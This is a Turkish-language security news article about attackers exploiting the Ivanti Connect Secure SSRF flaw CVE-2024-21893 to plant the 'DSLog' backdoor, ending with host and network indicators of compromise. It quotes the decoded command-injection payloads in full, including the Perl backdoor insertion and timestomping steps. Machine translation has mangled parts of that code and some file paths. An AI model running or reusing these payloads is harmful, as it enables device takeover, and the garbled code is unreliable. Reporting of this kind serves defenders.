Ivanti Connect Secure, daha önce, SAML modülündeki bir kusur nedeniyle kimliği doğrulanmamış tehdit aktörlerinin sınırsız kaynaklara erişmesine izin verebilecek başka bir SSRF güvenlik açığıyla keşfedilmişti. Güvenlik açığına CVE-2024-21893 atandı ve önem derecesi 8,2 (Yüksek) idi.
Ayrıca bu güvenlik açığının daha önce ifşa sırasında ortadaki tehdit aktörleri tarafından istismar edildiği bildirilmişti. Ancak son raporlar, tehdit aktörlerinin bu güvenlik açığından yararlanarak savunmasız cihazlara daha önce bilinmeyen ve heyecan verici bir “DSLog arka kapısı” kurduğunu gösteriyor.
Canlı saldırı simülasyonu Web Semineri, hesap ele geçirmenin çeşitli yollarını gösterir ve web sitelerinizi ve API’lerinizi ATO saldırılarına karşı korumaya yönelik uygulamaları gösterir.
Yerinizi Ayırın
Hackerlar Ivanti SSRF Kusurunu İstismar Ediyor
Raporlara göre bu güvenlik açığı, tehdit aktörlerinin komut enjeksiyonu ile bir arka kapı enjekte ederek istismar ettiği Ivanti cihazlarındaki yerleşik SAML modülünü etkiliyor. Bu arka kapıya temel bir “API Anahtarı” mekanizmasıyla erişiliyordu ve kontrol ediliyordu.
İlk istek
Saldırının ilk aşamasında, tehdit aktörleri “RetrievalMethod URI” ile kodlanmış bir komuttan oluşan, kimliği doğrulanmamış bir SAML kimlik doğrulama isteği gönderir. İsteğin, URI’nin yanında base64 kodlu bir komut içeren URL kodlu bir istek olduğu belirlendi.
URL ve base64 isteğinin kodunun çözülmesi, tehdit aktörlerinin istismar için kullandığı aşağıdaki komut satırını sağlar.
| http://127.0.0.1:8090/api/v1/license/keys-status/;echo echo $(uname – a;id)>/home/webserver/htdocs/dana-na/imgs/index2.txt| /usr/bin/base64 -d | /bin/bash; |
Bu komut, dahili keşif bilgilerini toplar ve ‘echo’ komut satırı aracını kullanarak bunu “index2.txt” adlı bir dosyaya kaydeder. Kodlanmış dizelerin kodu, base64 kod çözme yardımcı programı ve bash komut yorumlayıcısı kullanılarak da çözülür.
Arka Kapı Kurulumu
Yukarıdaki komut başarılı bir şekilde yürütüldükten sonra, tehdit aktörleri aynı URL yöntemini ve komutların Base64 kodlamasını kullanarak güvenlik açığı bulunan cihaza arka kapıyı yüklemeye çalışır. Talep şu şekilde:
| http://127.0.0.1:8090/api/v1/license/keys-status/;echo mount -o remount,rw / DESTDOSYA=”/home/perl/DSLog.pm” CLFILE=”/home/perl/DSLogMB.pm” if cat $DESTFILE | grep -q ‘HTTP_USER_AGENT’; Daha sonra yankı ‘Tamam’; başka sed -i ‘102i\\ benim \$ua = \$\ENV{HTTP_USER_AGENT};\n benim \$req = \$\ENV{QUERY_STRING};\n benim \$qur = \”da58bdb765904300581fe8a818c28cca7c0b62eabd7ce29f181924177c8f13c7\”;\n benim @param = split(/&/, \$req);\n if (index(\$ua, \$qur) != -1) {\n if (\$param[1]){\n @res = split(/=/, \$param[1]);\n if (\$res[0] eq \”cdi\”){\n \$res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex(\$1))/örneğin;\n \$res[1] =~ tr/!-~/P-~!-O/;\n system(\${res[1]});\n }\n }\n }’ $DESTFILE fi /bin/touch -r $CLFILE $DESTFILE rm -rf /var/çekirdekler/* /home/venv3/bin/python3 -c ‘DSMonitor’u içe aktar;DSMonitor.warmRestart()’| /usr/bin/base64 -d | /bin/bash; |
Bu arka kapı komutu, ele geçirilen cihazda yürütülür ve arka kapı, “DSLog.pm” adlı mevcut bir Perl dosyasına eklenir. DSLog, kimliği doğrulanmış web isteklerini ve web isteklerini ve cihazdaki sistem günlüklerini günlüğe kaydetmekten sorumlu bir modüldür.
Orange Cyber Defense, güçlü bir teknik altyapıya sahip olanlar için arka kapı, komut yürütme, metodolojiler ve diğer teknik ayrıntıların kapsamlı bir dökümünü sunar.
Uzlaşma Göstergeleri
Ana bilgisayar tabanlı IoC
| Yol + dosya adı | Doğramak | Tanım |
| /root/home/perl/DSLog[.]öğleden sonra | Yok – değişiklik gösterir | Meşru DSLog Log modülü |
| /root/home/webserver/htdocs/danana/imgs/index[.]txt | Yok – değişiklik gösterir | arka kapı |
| /root/home/webserver/htdocs/danana/imgs/index1[.]txt | Yok – değişiklik gösterir | Bazıları rastgele karakterler gibi görünüyor. |
| /root/home/webserver/htdocs/danana/imgs/index2[.]txt | Yok – değişiklik gösterir | Bazıları rastgele karakterler gibi görünüyor. |
| /root/home/web sunucusu/htdocs/danana/imgs/logo[.]png | ‘uname -a’ sonucunun yerleştirilmesi |
Ağ tabanlı IoC
| Ağ Göstergesi | Tip | Tanım |
| 159.65.123.122 | IP adresi | Büyük sömürü faaliyeti |
Siber Güvenlik haberleri, Teknik İncelemeler ve İnfografiklerden haberdar olun. Bizi LinkedIn’de takip edin & heyecan.